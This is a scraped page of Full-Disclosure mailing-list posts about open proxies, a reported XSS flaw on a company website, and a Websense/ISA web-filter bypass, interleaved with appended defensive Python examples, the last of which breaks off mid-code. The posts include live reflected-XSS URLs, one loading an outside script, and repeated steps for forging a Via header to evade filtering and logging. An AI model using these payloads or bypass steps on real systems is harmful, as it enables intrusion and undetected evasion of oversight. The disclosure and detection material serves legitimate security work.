Re: [Full-disclosure] Hacking in Schools
Wut? This isn't about golf?

On 2/25/2014 1:39 PM, Brandon Perry wrote:

I, for one, believe lumberjack skills are a must have for anyone entering the workforce today. The ability to hack trees down swiftly and efficiently is something I am not willing to train my employees to do. I fully expect our school systems to cover this in enough detail that, as an employer, I can expect recent graduates to hit the ground running.

Just my 2c.

Sent from a computer

On Feb 25, 2014, at 8:33 AM, Pete Herzog li...@isecom.org wrote:

How to teach hacking in school and open up education:
https://opensource.com/education/14/2/teach-hacking-schools-open-education

Sincerely,
-pete.

--
Pete Herzog - Managing Director - p...@isecom.org
ISECOM - Institute for Security and Open Methodologies
Need impartial, expert advice? Request a call: http://clarity.fm/peteherzog

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PoTTY v0.63 released
PoTTY is a re-branded PuTTY clone for Windows offering obfuscated-openssh (oossh) support (if you have to ask, you don't need it).

This version simply adds the bug fixes made to Simon Tatham's PuTTY v0.63 earlier this month. No new features/capabilities were added.

Download page:
http://www.mrhinkydink.com/potty63.htm

Obfuscated-openssh:
https://github.com/brl/obfuscated-openssh

Notes & Stuff:
http://mrhinkydink.blogspot.com/2013/08/potty-063-teaser.html
[Full-disclosure] McAfee Relay Server Product Installs Open Proxy On Consumer PCs
Earlier today I noticed I was getting a lot of TCP port 6515 proxies on The List (http://www.mrhinkydink.com/proxies.htm).

Curious, I checked one and it gave me a Via header of:

1.1 Fran-PC (McAfee Relay Server 5.2.3)

Then I took a peek at the database. Nearly 1900 of these things since December 1st, 2011.

Although the name of the PC above is a dead giveaway that this is some sort of consumer product ([name-of-owner]-PC is the default Windows machine name created during setup), a quick check of the DNS names of these boxes confirms they are all on residential IP addresses.

So what is McAfee Relay Server? I'm guessing it's one of those snarky products they stick you with whenever you buy a new PC. This makes sense, since December is a big month for new PCs.

But why install it as an open proxy? If it's a security product I hope it's a honeypot.
Re: [Full-disclosure] XSS Vulnerability in www.emerson.com
That... ahem... particular company has had that particular page (/MCS/email.aspx) in one form or another for a long time, since the late 90s at least, when it was a cgi app. IIRC, at one time you could SPAM anyone through it, but they learned their lesson and now you can only SPAM the company's employees. Considering the business they're in (think SCADA related) this could be a Bad Thing. The XSS is just the icing on the cake.

I find it interesting that they upgraded it to SharePoint. It's an in-house app, one of several. I believe the security model used to be "no one knows the URL".

I'm guessing you're a contractor for that particular company because, after all, no one knows the URL.

On Mon, 2011-09-05 at 02:00 +0530, Madhur Ahuja wrote:

One of the pages on the Emerson site is rendering the query string parameter without any inspection. This makes it possible to inject malicious content as shown below:

http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cimg%20src='http://www.emerson.com/SiteCollectionImages/local/united-states/english/fastpath/INBDB%2020110225.jpg'%3E

http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cscript%20src=%22http://madhur.github.com/files/js/site.js%22%20type=%22text/javascript%22%3E

--
Madhur
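An added example (mine, not code from the thread and not the Emerson page, whose source is not shown here) that models the reported behaviour in Python: a renderer that echoes the Title query parameter straight into the page, the same renderer with the value HTML-encoded, and a crude check that lists any tags the page template did not itself contain. The URL, page template and function names are assumptions; the payload follows the shape of the first reported URL.

```python
# Added example, not code from the thread or from the site it discusses.
# It models what the report describes (a query-string "Title" parameter
# echoed into the page unescaped) as a vulnerable renderer next to a
# hardened one. Template, host and function names are assumptions.
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed request URL with the shape of the report's first payload:
# an <img> tag smuggled through the Title parameter.
SAMPLE_URL = ("http://www.example.test/_layouts/MCS/Email.aspx"
              "?Title=%3Cimg%20src%3D'http://www.example.test/x.jpg'%3E")

TEMPLATE = "<html><body><h1>Send page: {title}</h1></body></html>"


def title_from_url(url):
    """Decoded first value of the Title query parameter ('' if absent)."""
    query = urlsplit(url).query
    return parse_qs(query, keep_blank_values=True).get("Title", [""])[0]


def render_vulnerable(url):
    """Reflects the parameter straight into HTML: the reported behaviour."""
    return TEMPLATE.format(title=title_from_url(url))


def render_hardened(url):
    """Same page, but the value is entity-encoded before insertion.
    quote=True also encodes quotes, so it stays safe inside attributes."""
    return TEMPLATE.format(title=html.escape(title_from_url(url), quote=True))


TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


def injected_tags(rendered, template=TEMPLATE):
    """Tags present in the output that the template did not contain: a
    crude reflected-XSS check to run over any (url, renderer) pair."""
    expected = set(TAG_RE.findall(template.format(title="")))
    return [t for t in TAG_RE.findall(rendered) if t not in expected]


if __name__ == "__main__":
    print(render_vulnerable(SAMPLE_URL))
    print(injected_tags(render_vulnerable(SAMPLE_URL)))  # the smuggled <img ...>
    print(render_hardened(SAMPLE_URL))
    print(injected_tags(render_hardened(SAMPLE_URL)))    # []
```

The check is deliberately simple (a tag regex against the template's own tags); it catches the reflected-tag case the report shows, not attribute or script-context injection, which need a context-aware encoder.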
[Full-disclosure] China - the land of open proxies
In July, hundreds of Chinese proxies on port 8909 started showing up every day on public proxy lists. In August the daily numbers were in the thousands.

Here is the list I collected during that period. There are 135K proxies in this file (text, tab delimited, ~8 megs).

http://www.mrhinkydink.com/utmods/135k.txt

You may want to right-click and "save as".

This is offered as data you may be able to use for forensic purposes or router block lists. Most of these proxies are currently offline. When they are online, they're very good proxies.

I believe this is similar to the PPLiveVA issue with TCP port 9415 that I noted back in April.

http://mrhinkydink.blogspot.com/2011/04/insecure-defaults-in-ppliveav-client.html

New port 9415 proxies stopped showing up on proxy lists when 8909 began to take over, which leads me to believe this is the hot new media client (either Youku or QQ) in Chinese-speaking countries.

--Mr. Hinky Dink

walk like a mannequin
roll like a tyre
act on reaction
dodge the Big Spud Fryer

http://mrhinkydink.blogspot.com
Re: [Full-disclosure] Yet Another Chinese Multimedia Player Supplies Thousands Of Open Proxies
On Sun, 2011-08-07 at 16:27 -0400, valdis.kletni...@vt.edu wrote:

On Sat, 06 Aug 2011 19:59:23 EDT, Mr. Hinky Dink said:

23,000+ showed up in July. Over 16,000 new ones in the first week of August. Somebody doesn't get it.
http://mrhinkydink.blogspot.com/2011/08/tcp-port-8909-proxies.html
See also...
http://mrhinkydink.blogspot.com/2011/04/insecure-defaults-in-ppliveav-client.html

Doesn't get it? You're making the rash assumption it's not intentional. You yourself say "Government spooks and contractors take note: you can use these to stage your false flag attacks!". Now take it one step further - what if they're intentionally open so the Chinese gov't can launch an attack through them and claim it was somebody else pulling a false flag attack?

You think that's too devious? Go read up on who financed the research that led to TOR - and *why* they financed it. (tl;dr: US Gov. financed it, so the US spooks could more easily fly under the wire mixed in with all the other nefarious people using TOR. So yes, it's patriotic to use TOR so it's even harder to use traffic analysis to track down our spooks. :)

There's always the possibility that *I* don't get it. Because I'm SOMEBODY dammit!

So... are you a spook or a contractor? Or both?
[Full-disclosure] Yet Another Chinese Multimedia Player Supplies Thousands Of Open Proxies
23,000+ showed up in July. Over 16,000 new ones in the first week of August. Somebody doesn't get it.

http://mrhinkydink.blogspot.com/2011/08/tcp-port-8909-proxies.html

See also...

http://mrhinkydink.blogspot.com/2011/04/insecure-defaults-in-ppliveav-client.html
[Full-disclosure] Seeking info on CVE-2011-0348
See also

http://www.cisco.com/warp/public/707/cisco-sa-20110126-csg2.shtml

Cisco Bug ID CSCtk35917

If you or one of your budz had anything to do with this and are not encumbered by NDA, please contact me off-list (or on -- it's all good). This kind of thing is my specialty, so I have a professional interest.

TIA
[Full-disclosure] Did someone hack Dave Aitel's Twitter account or is it an impostor?
Recent Tweets about http://dlvr.it/4lDy3, which is in Chinese (I think). And http://dlvr.it/4lDy3 which seems to be a security blog link trap (lots of crap that goes through linkbucks.com).

http://twitter.com/daveaitel
[Full-disclosure] PoTTy (Obfuscated PuTTy) vulnerable to storm's DLL Hijacking Exploit
NAME: PoTTy v0.60
VENDOR: Mr. Hinky Dink

PoTTy, an Open Source, modified version of Simon Tatham's PuTTy (Windows version, v0.60) for Bruce Leidl's Obfuscated-OpenSSH v5.2 server, has been demonstrated vulnerable to the recent Windows DLL hijacking exploit(s).

PROOF OF CONCEPT
See storm's (st...@gonullyourself.org) exploit code at http://www.exploit-db.com/exploits/14796/

VENDOR RESPONSE
WTF? How do I fix this?

REMEDIATION
Stop running Windows.

HISTORY
08/27/2010 - Vendor notified
08/27/2010 - Vendor craps pance
08/27/2010 - Vendor decides any publicity is good publicity
08/27/2010 - Vendor publishes details

LINKS:
This Notice: http://mrhinkydink.blogspot.com/2010/08/potty-dll-injection-vulnerability.html
Vendor Response: http://proxyobsession.net/?p=1097
PoTTy Download Page: http://www.mrhinkydink.com/potty.htm
Obfuscated-OpenSSH: http://github.com/brl/obfuscated-openssh

c. MMX Mr. Hinky Dink
[Full-disclosure] Websense/ISA Via: Bypass Redux
discovered by mrhinkydink

PRODUCT: Websense Enterprise
EXPOSURE: Trivial Web Policy Bypass (III)
LINK: http://mrhinkydink.blogspot.com/2010/08/websenseisa-via-bypass-redux.html

SYNOPSIS
On May 29, 2010 I demonstrated that by adding a Via: header to an HTTP request it is possible for a user to completely bypass filtering and monitoring in a Websense Enterprise 6.3.3/Microsoft ISA Server (2004 or 2006) proxy integration environment. This was addressed in Websense Knowledge Base article #5117. However, anyone familiar with the Via bypass technique would have noticed this remediation was insufficient.

PROOF OF CONCEPT
The following works in a Websense Enterprise system using the ISA Server integration product in a Cache Array Routing Protocol (CARP, sometimes referred to as CRAP) configuration, which requires at least two ISA servers.

Assuming there are two ISA servers configured as per Websense Knowledge Base article #5117, one at IP address 10.10.0.1 and another at 10.10.0.2, perform the following:

I. Install Firefox >= 3.5
II. Configure Firefox to use one of the proxy servers in the CARP array (10.10.0.1).
III. Obtain and install the Modify Headers plug-in by Gareth Hunt
IV. Configure the plug-in to add a valid Via: header pointing to the other server in the array. Example: Via: 1.0 10.10.0.2
V. Browse to a filtered Web site
VI. All content is allowed without monitoring or filtering

PoC RESTRICTIONS
All restrictions noted in the original Via Bypass article apply. See http://mrhinkydink.blogspot.com/2010/05/websense-633-via-bypass.html

OTHER USES
Limited only by your imagination! You do have an imagination, don't you? See http://mrhinkydink.blogspot.com/2010/05/websense-633-via-bypass.html

WORK-AROUNDS
Install Hotfix 17 provided by Websense.

HISTORY
06/25/2010 - vendor notified
08/13/2010 - vendor releases Hotfix 17
08/18/2010 - PoC published

c. MMX mrhinkydink
http://mrhinkydink.blogspot.com
http://proxyobsession.net
Re: [Full-disclosure] targetted SSH bruteforce attacks
Have you ever considered obfuscated-openssh?

http://github.com/brl/obfuscated-openssh

I have a modified version of PuTTY available for it...

http://www.mrhinkydink.com/potty.htm

Still... you should change the freakin' port.

Original Message
Subject: [Full-disclosure] targetted SSH bruteforce attacks
From: Gary Baribault g...@baribault.net
Date: Thu, June 17, 2010 7:48 am
To: full-disclosure@lists.grok.org.uk

Hello list,

I have a strange situation and would like information from the list members. I have three Linux boxes exposed to the Internet. Two of them are on cable modems, and both have two services that are publicly available. In both cases, I have SSH and named running and available to the public. Before you folks say it, yes I run SSH on TCP/22 and no I don't want to move it to another port, and no I don't want to restrict it to certain source IPs.

Both of these systems are within one /21 and get attacked regularly. I run Denyhosts on them, and update the central server once an hour with attacking IPs, and obviously also download the public hosts.deny list. These machines get hit regularly, so often that I don't really care, it's fun to make the script kiddies waste their time!

But in this instance, only my home box is being attacked... someone is burning a lot of cycles and hosts to do a distributed dictionary attack on my one box! The named daemon is non-recursive, properly configured, up to date and not being attacked.

Is anyone else seeing this type of attack? Or is someone really targeting MY box?

Thanks

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
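An added example (mine, not from Gary's post and not Denyhosts code) for the situation he describes. Denyhosts-style blocking counts failures per source address, which is exactly what a distributed dictionary attack stays under: many hosts, a handful of attempts each. This Python block parses sshd "Failed password" lines and groups them both by source and by target account, so the low-rate sources show up together as one campaign. The log lines are constructed for the example and the thresholds are assumptions.

```python
# Added example, not code from the thread or from Denyhosts. Parses sshd
# failure lines and separates sources a per-IP rule would block from the
# low-rate sources that together make up a distributed dictionary attack.
import re
from collections import Counter, defaultdict

# Constructed sample in the OpenSSH/syslog format Denyhosts consumes:
# one noisy source hammering root, five sources trying one password each.
SAMPLE_LOG = """\
Jun 17 07:48:01 home sshd[2101]: Failed password for root from 203.0.113.5 port 51234 ssh2
Jun 17 07:48:03 home sshd[2103]: Failed password for root from 203.0.113.5 port 51240 ssh2
Jun 17 07:48:04 home sshd[2105]: Failed password for root from 203.0.113.5 port 51241 ssh2
Jun 17 07:48:05 home sshd[2107]: Failed password for invalid user admin from 198.51.100.7 port 40001 ssh2
Jun 17 07:48:06 home sshd[2109]: Failed password for invalid user admin from 198.51.100.8 port 40002 ssh2
Jun 17 07:48:07 home sshd[2111]: Failed password for invalid user admin from 198.51.100.9 port 40003 ssh2
Jun 17 07:48:08 home sshd[2113]: Failed password for invalid user admin from 198.51.100.10 port 40004 ssh2
Jun 17 07:48:09 home sshd[2115]: Failed password for invalid user oracle from 198.51.100.11 port 40005 ssh2
Jun 17 07:48:10 home sshd[2117]: Accepted publickey for gary from 192.0.2.20 port 50022 ssh2
"""

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_failures(log_text):
    """Return (user, source_ip) for every failed password attempt."""
    out = []
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            out.append((m.group("user"), m.group("ip")))
    return out


def analyse(failures, per_ip_threshold=3, distributed_min_sources=4):
    """Split sources into those a per-IP rule (Denyhosts-style) catches and
    those staying under it, then decide whether the low-rate sources look
    like one coordinated dictionary attack. Thresholds are assumptions."""
    per_ip = Counter(ip for _, ip in failures)
    per_user = Counter(user for user, _ in failures)
    users_by_ip = defaultdict(set)
    for user, ip in failures:
        users_by_ip[ip].add(user)

    noisy = sorted(ip for ip, n in per_ip.items() if n >= per_ip_threshold)
    quiet = sorted(ip for ip, n in per_ip.items() if n < per_ip_threshold)
    # Accounts probed by the low-rate sources: the campaign's dictionary,
    # which no single-IP counter ever sees in aggregate.
    quiet_users = Counter(user for user, ip in failures if ip in quiet)
    return {
        "per_ip": dict(per_ip),
        "per_user": dict(per_user),
        "blocked_by_per_ip_rule": noisy,
        "low_rate_sources": quiet,
        "distributed": len(quiet) >= distributed_min_sources,
        "distributed_dictionary": dict(quiet_users),
    }


if __name__ == "__main__":
    report = analyse(parse_failures(SAMPLE_LOG))
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run it over a real /var/log/auth.log slice instead of SAMPLE_LOG and the "distributed_dictionary" counter is the thing to watch: a long tail of distinct sources all trying the same few account names is the signature of the attack Gary describes, whatever the per-IP numbers say.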
Re: [Full-disclosure] targetted SSH bruteforce attacks
Point taken. However, my ulterior motive was in promoting obfuscated-openssh, which, IMHO, is an excellent and under-appreciated enhancement to openssh.

Note that with iptables you can leave ssh on port 22 but have it answer on other ports. See http://proxyobsession.net/?p=869

Why anyone would want to do that is beyond me.

Original Message
Subject: Re: [Full-disclosure] targetted SSH bruteforce attacks
From: Gary Baribault g...@baribault.net
Date: Thu, June 17, 2010 8:44 am
To: full-disclosure@lists.grok.org.uk

I just knew that people would say that, and that's why I specified that I WANT to keep SSH on 22 .. it's fun to see the attacks, and it's interesting to see new types of attacks. The question here is whether anyone else is seeing such a targeted attack.

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
Re: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass
Chaining downstream proxies to ISA and requiring Windows Integrated Auth has been an issue for a long time (it generally breaks the chain, so that fixes the bypass problem right there), but frankly I'm guessing. Windows Auth brings a lot of incompatibilities with it. I wouldn't recommend it unless it was absolutely required, but its proxy-chain-breaking properties are legendary.

The ISA server will continue to log, even though Websense won't, so you do have that. But ISA won't filter, so you're back to square one. And comparing the two databases for discrepancies can get ugly. By the time you get around to comparing the databases, the damage has already been done. It becomes a forensics exercise at that point.

What I think is going on here is either:

A) The Websense ISA plug-in sees that the request has come in by proxy and assumes it has already been filtered by the originating proxy or...

B) ISA sees the request has come in by proxy and therefore doesn't send the request to the Websense ISA plug-in for filtering.

If it's B, then it's a Microsoft issue and it may never get fixed (and it becomes a marketing bullet point for ISA Server TMG). If the same problem occurs in a SQUID integration of Websense 6.3.3, then it's definitely A.

I have a feeling Websense fixed it in the 7.x series, so they're probably not motivated to fix it in 6.x. Again, I don't have the resources to test that theory (and I asked Dan Hubbard politely for a temporary license for research purposes). My hunch is they did fix it in 7.x because they pretty much ignored me after the first e-mail I sent back in October 2009.

Original Message
Subject: RE: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass
From: Thor (Hammer of God) t...@hammerofgod.com
Date: Sun, May 30, 2010 12:30 pm
To: d...@mrhinkydink.com, full-disclosure@lists.grok.org.uk

Adding Via: completely bypasses monitoring too?? That is bad. I've never used Websense, so pardon my ignorance, but this wouldn't apply to ISA's native monitoring and logging, so I'm just curious about what's going on under the covers. Via: bypassing the filter is not good but bypassing monitoring (and presumably logging) is really bad. Nice find.

I am curious as to what your thoughts are regarding Windows Auth as a mitigation. While it's nice that ISA could help solve a problem with Websense, I don't see how that would work. How would requiring auth solve Websense's inability to filter Via: headers?

t

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of d...@mrhinkydink.com
Sent: Saturday, May 29, 2010 8:25 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass

discovered by mrhinkydink

PRODUCT: Websense Enterprise v6.3.3
EXPOSURE: Trivial Web Policy Bypass

SYNOPSIS
By adding a Via: header to an HTTP request it is possible for a user to completely bypass filtering and monitoring in a Websense Enterprise 6.3.3/Microsoft ISA Server (2004 or 2006) proxy integration environment.

PROOF OF CONCEPT
The following works in a Websense 6.3.3 Enterprise system using the ISA Server integration product and transparent authentication. It is assumed it will work with other proxy integration products, but this has not been tested.

I. Install Firefox >= 3.5
II. Obtain and install the Modify Headers plug-in by Gareth Hunt
III. Configure the plug-in to add a valid Via: header to every request. Example: Via: 1.1 VIAPROXY
IV. Browse to a filtered Web site
V. All content is allowed without monitoring

PoC VIDEO!
http://www.youtube.com/watch?v=H520rQ8JOLY

PoC RESTRICTIONS
The Modify Headers plug-in does not work with SSL. However, in practice a user could browse to a so-called (by Websense) "Proxy Avoidance" Web site and use the SSL capabilities of the remote proxy.

OTHER USES
Properly configured, a downstream SQUID proxy can send requests to the upstream ISA server and all requests will pass through without blocking or monitoring. No evidence of activity will be logged by Websense. This was in fact how this vulnerability was originally discovered. Considering the simplicity of the attack, the author suspects this bypass technique is already well-known in certain circles.

Also, it is trivial to modify proxy-enabled Linux utilities to leverage this bypass. The author has recompiled (that is, HACKED) OpenVPN, connect-proxy, PuTTY, stunnel, and others to take advantage of this policy bypass. Obviously, the risk of undetected (by Websense, at least) covert tunnels is high in a vulnerable installation of this product.

Linux platforms using this method in this specific environment will also enjoy bypassing Websense's transparent authentication requirement.

WORK-AROUNDS
For this
Re: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass
When you look at the MUSTs for Via in RFC 2616, there are only three. None of them seem to be applicable here. And, of course, nowhere does it say a client MUST NOT fake a Via header. ;-)

So you have an assumption that if an HTTP request with a Via header passes through your device it must have gotten there legitimately and it must be treated accordingly.

In other words, this trick may have untapped potential.

Original Message
Subject: Re: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass
From: Christian Sciberras uuf6...@gmail.com
Date: Sun, May 30, 2010 1:40 pm
To: Thor (Hammer of God) t...@hammerofgod.com
Cc: d...@mrhinkydink.com, full-disclosure@lists.grok.org.uk

My first thought on this find was "cool". However the more I think about this, the more I think there's something seriously amiss. I would assume that there is some inside code which specifically tells it to turn off everything when via is used? If this is so, what stops us from concluding this was some sort of backdoor? The only other reason for this would be them trying to support via but did a(n extremely) bad job about it.

Cheers.
Christian Sciberras

On Sun, May 30, 2010 at 6:30 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:

Adding Via: completely bypasses monitoring too?? That is bad. I've never used Websense, so pardon my ignorance, but this wouldn't apply to ISA's native monitoring and logging, so I'm just curious about what's going on under the covers. Via: bypassing the filter is not good but bypassing monitoring (and presumably logging) is really bad. Nice find.

I am curious as to what your thoughts are regarding Windows Auth as a mitigation. While it's nice that ISA could help solve a problem with Websense, I don't see how that would work. How would requiring auth solve Websense's inability to filter Via: headers?

t

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of d...@mrhinkydink.com
Sent: Saturday, May 29, 2010 8:25 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass

discovered by mrhinkydink

PRODUCT: Websense Enterprise v6.3.3
EXPOSURE: Trivial Web Policy Bypass

SYNOPSIS
By adding a Via: header to an HTTP request it is possible for a user to completely bypass filtering and monitoring in a Websense Enterprise 6.3.3/Microsoft ISA Server (2004 or 2006) proxy integration environment.

PROOF OF CONCEPT
The following works in a Websense 6.3.3 Enterprise system using the ISA Server integration product and transparent authentication. It is assumed it will work with other proxy integration products, but this has not been tested.

I. Install Firefox >= 3.5
II. Obtain and install the Modify Headers plug-in by Gareth Hunt
III. Configure the plug-in to add a valid Via: header to every request. Example: Via: 1.1 VIAPROXY
IV. Browse to a filtered Web site
V. All content is allowed without monitoring

PoC VIDEO!
http://www.youtube.com/watch?v=H520rQ8JOLY

PoC RESTRICTIONS
The Modify Headers plug-in does not work with SSL. However, in practice a user could browse to a so-called (by Websense) "Proxy Avoidance" Web site and use the SSL capabilities of the remote proxy.

OTHER USES
Properly configured, a downstream SQUID proxy can send requests to the upstream ISA server and all requests will pass through without blocking or monitoring. No evidence of activity will be logged by Websense. This was in fact how this vulnerability was originally discovered. Considering the simplicity of the attack, the author suspects this bypass technique is already well-known in certain circles.

Also, it is trivial to modify proxy-enabled Linux utilities to leverage this bypass. The author has recompiled (that is, HACKED) OpenVPN, connect-proxy, PuTTY, stunnel, and others to take advantage of this policy bypass. Obviously, the risk of undetected (by Websense, at least) covert tunnels is high in a vulnerable installation of this product.

Linux platforms using this method in this specific environment will also enjoy bypassing Websense's transparent authentication requirement.

WORK-AROUNDS
For this specific installation scenario (Websense 6.3.3 + ISA 2004/6 + transparent authentication), none are known. The following may work:

* Use Windows Integrated Authentication on the ISA Server
* Upgrade to Websense 7.x
* Do not use a proxy integration product

HISTORY
10/09/2009 - vendor notified
05/29/2010 - PoC published

URL
http://mrhinkydink.blogspot.com/2010/05/websense-633-via-bypass.html

c. MMX mrhinkydink
Re: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass
I wouldn't call breaking proxy chaining mitigation, either. More like a quick fix, if and only if it works. Or maybe you'd call it a work-around, which is what I called it in the first place.

No, there's nothing at all in the Websense database indicating you went to playboy.com. You are home free until someone decides to look at the ISA logs (if logging is turned on) and finds it in there. But you spent good money on Websense and want pretty reports with charts and colors and your company logo, right?

In that way, this is much better than my 2007 User-Agent hack (now fixed). Your indiscretions were logged, but not blocked or categorized.

Now, as far as stripping out the Via header at ISA goes, per RFC 2616...

Multiple Via field values represents each proxy or gateway that has forwarded the message. Each recipient MUST append its information such that the end result is ordered according to the sequence of forwarding applications.

"MUST append..." does not mean, in my understanding of the English language (and RFC 2119), "delete the downstream device's Via header". If you do anything other than append... (which you MUST do), you're breaking the RFC. And if you go around breaking RFCs, you're BAD, m'kay? ;-)

Link to 2007 User-Agent hack, just in case you missed it...

http://mrhinkydink.blogspot.com/2007/12/websense-policy-filtering-bypass.html

Original Message
Subject: RE: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass
From: Thor (Hammer of God) t...@hammerofgod.com
Date: Sun, May 30, 2010 2:19 pm
To: d...@mrhinkydink.com
Cc: full-disclosure@lists.grok.org.uk

Ah, authenticating at the web proxy *chain*. That wasn't intuitive from the original post... breaking the chain by requiring an auth mechanism that the downstream proxy doesn't support really isn't a mitigation, but now I understand the basis of the statement. But, if they fixed it in 7.x, then it obviously wasn't B below. ISA wouldn't work like that anyway. It doesn't send requests to the plug-in. You either use a filter or you don't. For instance, if I simply used the web proxy filter instead, I could filter for Via: and block it. But then again, if I had to do that, I wouldn't have purchased Websense but rather handled all my blocking at ISA.

Not that it really matters to me personally, but I am curious - is the logging of the request completely dropped, or is it just not logged as a filtered request. IOW, if I'm behind the downstream proxy, and I go to playboy.com, Websense logs the request and part of the logging is that it was filtered or blocked or something. But if I set Via in the downstream proxy (or at the client via something like firefox) and go to playboy.com, not only do I reach the site, but there is no record whatsoever that I went to playboy? If it is the latter, then they would HAVE to fix it in 6.3.3 IMO.

t

-Original Message-
From: d...@mrhinkydink.com [mailto:d...@mrhinkydink.com]
Sent: Sunday, May 30, 2010 10:47 AM
To: Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass

Chaining downstream proxies to ISA and requiring Windows Integrated Auth has been an issue for a long time (it generally breaks the chain, so that fixes the bypass problem right there), but frankly I'm guessing. Windows Auth brings a lot of incompatibilities with it. I wouldn't recommend it unless it was absolutely required, but its proxy-chain-breaking properties are legendary.

The ISA server will continue to log, even though Websense won't, so you do have that. But ISA won't filter, so you're back to square one. And comparing the two databases for discrepancies can get ugly. By the time you get around to comparing the databases, the damage has already been done. It becomes a forensics exercise at that point.

What I think is going on here is either:

A) The Websense ISA plug-in sees that the request has come in by proxy and assumes it has already been filtered by the originating proxy or...

B) ISA sees the request has come in by proxy and therefore doesn't send the request to the Websense ISA plug-in for filtering.

If it's B, then it's a Microsoft issue and it may never get fixed (and it becomes a marketing bullet point for ISA Server TMG). If the same problem occurs in a SQUID integration of Websense 6.3.3, then it's definitely A.

I have a feeling Websense fixed it in the 7.x series, so they're probably not motivated to fix it in 6.x. Again, I don't have the resources to test that theory (and I asked Dan Hubbard politely for a temporary license for research purposes). My hunch is they did fix it in 7.x because they pretty much ignored me after the first e-mail I sent back in October 2009.

Original Message
Subject: RE: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass
From: Thor (Hammer of God)
Date: Sun, May 30, 2010 12:30
[Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass
discovered by mrhinkydink

PRODUCT: Websense Enterprise v6.3.3
EXPOSURE: Trivial Web Policy Bypass

SYNOPSIS
By adding a Via: header to an HTTP request it is possible for a user to completely bypass filtering and monitoring in a Websense Enterprise 6.3.3/Microsoft ISA Server (2004 or 2006) proxy integration environment.

PROOF OF CONCEPT
The following works in a Websense 6.3.3 Enterprise system using the ISA Server integration product and transparent authentication. It is assumed it will work with other proxy integration products, but this has not been tested.

I. Install Firefox >= 3.5
II. Obtain and install the Modify Headers plug-in by Gareth Hunt
III. Configure the plug-in to add a valid Via: header to every request. Example: Via: 1.1 VIAPROXY
IV. Browse to a filtered Web site
V. All content is allowed without monitoring

PoC VIDEO!
http://www.youtube.com/watch?v=H520rQ8JOLY

PoC RESTRICTIONS
The Modify Headers plug-in does not work with SSL. However, in practice a user could browse to a so-called (by Websense) "Proxy Avoidance" Web site and use the SSL capabilities of the remote proxy.

OTHER USES
Properly configured, a downstream SQUID proxy can send requests to the upstream ISA server and all requests will pass through without blocking or monitoring. No evidence of activity will be logged by Websense. This was in fact how this vulnerability was originally discovered. Considering the simplicity of the attack, the author suspects this bypass technique is already well-known in certain circles.

Also, it is trivial to modify proxy-enabled Linux utilities to leverage this bypass. The author has recompiled (that is, HACKED) OpenVPN, connect-proxy, PuTTY, stunnel, and others to take advantage of this policy bypass. Obviously, the risk of undetected (by Websense, at least) covert tunnels is high in a vulnerable installation of this product.

Linux platforms using this method in this specific environment will also enjoy bypassing Websense's transparent authentication requirement.

WORK-AROUNDS
For this specific installation scenario (Websense 6.3.3 + ISA 2004/6 + transparent authentication), none are known. The following may work:

* Use Windows Integrated Authentication on the ISA Server
* Upgrade to Websense 7.x
* Do not use a proxy integration product

HISTORY
10/09/2009 - vendor notified
05/29/2010 - PoC published

URL
http://mrhinkydink.blogspot.com/2010/05/websense-633-via-bypass.html

c. MMX mrhinkydink
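An added example (mine, not the advisory's code and not anything from Websense, Microsoft or McAfee) that serves two posts on this page: the "McAfee Relay Server" post, where a proxy is identified from the Via hop it appends to responses, and this Websense bypass, where the client itself sends a Via hop naming a proxy so the request looks already forwarded. In Python it parses Via values per RFC 2616, fingerprints a proxy from a captured response, builds the request the PoC describes, and implements the check an upstream proxy (or its filter plug-in) should make before treating a request as already filtered: tie the last Via hop to the TCP peer, never to the header alone. The array addresses, host names and sample response are constructed; probe() does real network I/O and is the only part not exercised offline.

```python
# Added example: not the advisory's code, nor Websense/ISA/McAfee code.
# Via hop grammar (RFC 2616): [protocol/]version received-by [(comment)]
import re
import socket

VIA_HOP_RE = re.compile(
    r"(?:(?P<proto>[\w.-]+)/)?(?P<version>[\w.]+)\s+(?P<by>[^\s,(]+)"
    r"(?:\s*\((?P<comment>[^)]*)\))?"
)

# Constructed data: a two-member CARP array (hostname or IP -> peer address)
# and one response in the shape the McAfee post reports, with the product
# string leaked in the Via comment.
ARRAY = {"10.10.0.1": "10.10.0.1", "10.10.0.2": "10.10.0.2",
         "isa2.corp.example": "10.10.0.2"}
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                   b"Via: 1.1 Fran-PC (McAfee Relay Server 5.2.3)\r\n"
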